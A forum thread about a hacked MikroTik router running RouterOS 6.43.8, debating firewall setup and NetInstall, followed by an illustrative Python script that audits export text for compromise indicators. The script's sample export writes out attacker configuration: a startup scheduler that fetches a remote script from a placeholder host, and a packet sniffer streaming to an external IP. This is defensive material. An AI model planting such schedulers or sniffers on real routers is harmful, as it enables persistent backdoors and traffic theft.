I have a RB that has been attacked twice in two months.
I don’t have an export, but:
RB is dst-natted with port 8292 to 8291
There’s a simple firewall that drops invalid connections, then accepts connections from a src-address list, accepts icmp, established, related and drops input.
Only winbox, telnet, ssh and api services are enabled (but only 8291 is reachable from the Internet).
ROS 6.43.8
The RB has been attacked by someone who:
Added a user called “admin” with group full
Redirected port 80 requests to port 8080
Set up a Web Proxy
Sniffed all interfaces, sending the file to 185.21.109.18
Perhaps you should not use the word vulnerability until it is confirmed …
Until now you can only name it “hacked” …
And the reason for that is not clear
PS,
send an email to support@mikrotik.com for help; this is a user forum, not a support forum
Well, we know for a fact that in the previous version Winbox had a vulnerability. Opening this to the world is like waiting for this to happen. What you said may or may not be true.
You should set up a VPN instead, like PPTP, OVPN, etc. Much safer.
If the reason is unknown, it’s not a hack until you spot what’s wrong in the config
I have the same config everywhere
Winbox is not open to the world; I have an accept rule with a src-address list of the public IPs that I use to connect (exactly 4).
Everything in input is dropped except for ICMP, port 2000 for bandwidth test, established, related and broadcast connection, DNS only for LAN interfaces.
The only port exposed to the Internet is 8291; the RB hasn’t got a public IP, plus it has a firewall that should drop everything and accept only 8291 connections from the address list.
How can I be hacked? For God’s sake, one port open, with a firewall; it’s obviously a vulnerability.
Router has been hacked using a vulnerability before 6.43.8, should I NetInstall it?
Edited the title by the way.
Winbox isn’t open to the Internet, I have a firewall that accepts only connections from my address list.
I don’t use port knocking.
I don’t need VPN access for this, I’m the ISP of the customer.
Yes, but I don’t know if it’s the same vulnerability that was spotted in April. I already found alexey attacks that block that vulnerability with the firewall, but this isn’t the case.
Currently there are no new known Winbox port vulnerabilities.
If you are sure that after the first hack you reinstalled the router and changed login credentials, then contact support.
There are cases where routers get “hacked” even after upgrade, because already stolen credentials were not changed.
mrz, are you sure you are MT support? LOL. From all my simple readings, a re-install does not cure a properly hacked unit (from the hacker’s perspective); one needs to do a NET INSTALL (which I gather erases memory that a normal reinstall doesn’t touch??)
Sorry to hear about your issue, Redmond. However, for router access, I wouldn’t count on source list protection as being a good security practice. Perhaps with a server of some sort that is isolated from one’s LAN, that may be sufficient, assuming that the server has credential login, BUT to the router NO EFFING WAY.
I just wanted to comment on this: you seemed to indicate that you made an accept rule for your address list??
You should do that all on the NAT rule…
ex.
add action=dst-nat chain=dstnat comment=Solar_UDP dst-port=zz \
    in-interface-list=WAN log=yes protocol=udp src-address-list=Solar_Panel \
    to-addresses=192.168.z.zz
Anav … should mrz explain again and again, step by step, what to do when you are hacked, or could we expect that the author is aware of https://blog.mikrotik.com/
If you are talking about malware, then :
“Simply upgrading RouterOS software deletes the malware, any other 3rd party files and closes the vulnerability”
If you are talking about configuration change then of course those need to be corrected or router should be netinstalled and configured from scratch.
Concur Bartoz, of course the OP should have his … … whacked for not using netinstall after being hacked in the past. This has been documented on almost every thread on the subject and in the blog and and and and and… Furthermore, relying on source address list protection for the router is cwazee!! At least for {insert your deity of choice} sake use the minimum of port-knock lol. But for the supposed MT support person to be ‘loose’ with lingo, hmmm, perhaps he needs remedial training, as re-install is not = net install.
No hard feelings mrz, nothing that cannot be solved by a few shots of schnapps (probably two for me and I would be under the table).
In this particular case I have a dst-nat with dst-port 8292 and to-ports 8291 (for example to-addresses 192.168.88.2) and no other ports forwarded.
Then on 192.168.88.2 I have an address list with my public IP, an accept rule (chain input, src-address-list the one with my IP, action accept, i.e. everything that comes from my public IP), then rules like the defconf firewall, plus ICMP accept on input and TCP 2000 accept for bandwidth tests.
If I set an address list in the dst-nat I should avoid the hack, unless the hacker tries to hack the RB that is doing the NAT, in which case I have the same problem.
I don’t know if adding allowed addresses to local users would solve the problem; I don’t know if the hacker got my password or used a vulnerability that bypasses login (no log, because of the hacker’s scripts).
I obviously can’t NetInstall every RB that I have around, and updating RBs that are more than 100 km away is always a risk, so I can’t do that for 3000+ RBs at the same time and then run to change them in case of a bootloop or something else.
I need to be sure what vulnerability has been used (as I said, it was attacked before 6.43.8, I didn’t know until today) and then modify my firewall to prevent it.
So I’m asking if someone experienced a hack like this, and for all information about it.
I’ve also found schedulers that on startup and every day fetch the hacker’s files again, and there was also a packet sniffer.
“Regardless of version used, all RouterOS versions that have the default firewall enabled, are not vulnerable”
I want to know what makes the defconf firewall secure and not mine; but if someone from support said that the defconf firewall is secure, and this one has everything that makes it as secure as the defconf one, then one of two things is true:
Defconf firewall isn’t secure
There’s a new vulnerability
I have been attacked twice on this RB, and on some others by another hacker (alexey); every RB has this firewall:
In the config ether1 is the LAN interface.
The admin address list has some public and private IPs that are used for API, my Winbox connection and Dude monitoring.
If you have any suggestions please post as config.
Defconf doesn’t protect device from within. If you were hacked a year ago, cleared the config but left one script in the device, it could have reconfigured itself even after you installed a better firewall and upgraded.
Is my firewall as secure as defconf? Please tell me what you think.
I set the firewall on the public interface
The device has got the firewall I’ve posted, even if it’s behind NAT.
I’ve found other RBs hacked; after removing all unusual config and updating, they have been hacked again.
In all cases I have this firewall, which is very similar to the defconf one, so if what is written on blog.mikrotik.com is true, there’s another problem.
Just tell me if this firewall is as secure as the defconf one; remember that src-address-list admin contains only the 3 public IPs that I use.
Normis has made it quite clear that a router out of the box is good to go regarding security from the public interface.
In other words, it can be used without concern of hacking from external sources.
If the admin then changes the rules and for example ADDS external access in an unsafe manner, then the router could be hackable. From my readings this was one of the major problems with many of the MT reported hacks.
If the admin does not secure access to the router internally and a device behind the router is hacked due to phishing, going to unsafe sites etc., then the router could be vulnerable from the inside, but I am not sure how that happens. There are easy ways to mitigate this…
Most people only allow specific LAN IPs to winbox. They use a different username and password from the default etc…
Finally and this is the point you keep missing, if the router has been hacked in the past, changing the config, re-setting to defaults, updating to the latest firmware WILL PROBABLY NOT WORK to remove the hack.
You need to use NET INSTALL which wipes internal memory not touched by all the other methods.
In summary, your FW can be the most elegant setup in the world, the safest and most secure setup ever, but it’s completely useless if NET INSTALL was not used, as the bad guy has a backdoor into your router sitting there waiting for you to turn the unit on and connect to the net.
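As an added illustration (not the OP’s config and not MikroTik’s code), the following Python script parses the text of a RouterOS `/export` and reports two things the thread keeps circling back to: the post-compromise changes the OP found (an extra user, the port 80 to 8080 redirect, an enabled web proxy, a sniffer streaming to an external host, schedulers that fetch files on startup), and the Winbox exposure points raised in the replies (a dst-nat to 8291 with no src-address-list, as Anav pointed out; an input accept for 8291 with no source or interface restriction; no unconditional drop at the end of the input chain). The export syntax it assumes is described in the docstring; the sample export is constructed from the configuration described in the thread, the expected-user list is an assumed parameter, and the scheduler URL host is a placeholder.

```python
"""Offline audit of RouterOS export text (added example, not MikroTik code).

Assumed export shape: a menu path line such as `/ip firewall filter`
followed by `add key=value ...` or `set key=value ...` commands, with
double-quoted values and trailing-backslash line continuations.
"""
import shlex
from typing import Dict, List, Tuple

Entry = Tuple[str, str, Dict[str, str]]  # (menu path, verb, key=value pairs)
WINBOX_PORT = "8291"


def parse_export(text: str) -> List[Entry]:
    """Turn export text into (section, verb, properties) tuples."""
    entries: List[Entry] = []
    section, pending = "", []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        continued = line.endswith("\\")
        pending.append(line[:-1] if continued else line)
        if continued:  # command continues on the next line
            continue
        command, pending = " ".join(pending), []
        if command.startswith("/"):  # menu path, e.g. /ip firewall nat
            section = command
            continue
        tokens = shlex.split(command)  # keeps quoted values as one token
        props: Dict[str, str] = {}
        for tok in tokens[1:]:
            key, _, value = tok.partition("=")
            props[key] = value
        entries.append((section, tokens[0], props))
    return entries


def active(entries: List[Entry]) -> List[Entry]:
    """Ignore rules the export marks as disabled."""
    return [e for e in entries if e[2].get("disabled") != "yes"]


def find_indicators(entries: List[Entry], expected_users=("admin",)) -> List[str]:
    """Flag the post-compromise changes reported in the thread."""
    findings: List[str] = []
    for section, verb, p in active(entries):
        if section == "/user" and verb == "add" and p.get("name") not in expected_users:
            findings.append(f"unexpected user {p.get('name')!r} in group {p.get('group')!r}")
        elif (section == "/ip firewall nat" and p.get("chain") == "dstnat"
              and p.get("dst-port") == "80" and p.get("to-ports") == "8080"):
            findings.append("dstnat rule redirects port 80 to 8080")
        elif section == "/ip proxy" and p.get("enabled") == "yes":
            findings.append("web proxy is enabled")
        elif section == "/system scheduler" and "fetch" in p.get("on-event", ""):
            findings.append(f"scheduler {p.get('name')!r} fetches remote content")
        elif section == "/tool sniffer" and p.get("streaming-enabled") == "yes":
            findings.append(f"packet sniffer streams to {p.get('streaming-server')}")
    return findings


def audit_firewall(entries: List[Entry]) -> List[str]:
    """Check the Winbox exposure points discussed in the replies."""
    findings: List[str] = []
    source_keys = ("src-address-list", "src-address")
    input_rules = [p for s, v, p in active(entries)
                   if s == "/ip firewall filter" and v == "add" and p.get("chain") == "input"]
    for s, _, p in active(entries):
        if (s == "/ip firewall nat" and p.get("action") == "dst-nat"
                and WINBOX_PORT in (p.get("to-ports"), p.get("dst-port"))
                and not any(k in p for k in source_keys)):
            findings.append(f"dst-nat of port {p.get('dst-port')} to Winbox has no source restriction")
    for p in input_rules:
        if (p.get("action") == "accept" and p.get("dst-port") == WINBOX_PORT
                and not any(k in p for k in source_keys + ("in-interface", "in-interface-list"))):
            findings.append("input accept for 8291 has no source or interface restriction")
    last = input_rules[-1] if input_rules else {}
    if not (last.get("action") == "drop"
            and set(last) <= {"action", "chain", "comment", "log", "log-prefix"}):
        findings.append("input chain does not end with an unconditional drop")
    return findings


# Constructed sample: the firewall described by the OP plus the changes the
# OP found on the hacked unit. The scheduler host is a placeholder.
SAMPLE_EXPORT = """\
/ip firewall filter
add action=drop chain=input connection-state=invalid
add action=accept chain=input src-address-list=admin
add action=accept chain=input protocol=icmp
add action=accept chain=input connection-state=established,related
add action=drop chain=input
/ip firewall nat
add action=dst-nat chain=dstnat dst-port=8292 protocol=tcp \\
    to-addresses=192.168.88.2 to-ports=8291
add action=redirect chain=dstnat dst-port=80 protocol=tcp to-ports=8080
/ip proxy
set enabled=yes
/system scheduler
add interval=1d name=upd on-event="/tool fetch url=http://PLACEHOLDER-HOST/s.rsc" \\
    start-time=startup
/tool sniffer
set streaming-enabled=yes streaming-server=185.21.109.18
/user
add group=full name=admin
"""

if __name__ == "__main__":
    parsed = parse_export(SAMPLE_EXPORT)
    for line in find_indicators(parsed, expected_users=("ops",)) + audit_firewall(parsed):
        print("FINDING:", line)
```

Run against a real export (`/export file=...` copied off the device) the indicator list is a quick triage of whether the device still carries the changes described above, and the firewall findings show whether the Winbox path is restricted at the NAT rule as well as in the input chain, so a compromise of the NATting router and a compromise of the device behind it are checked separately.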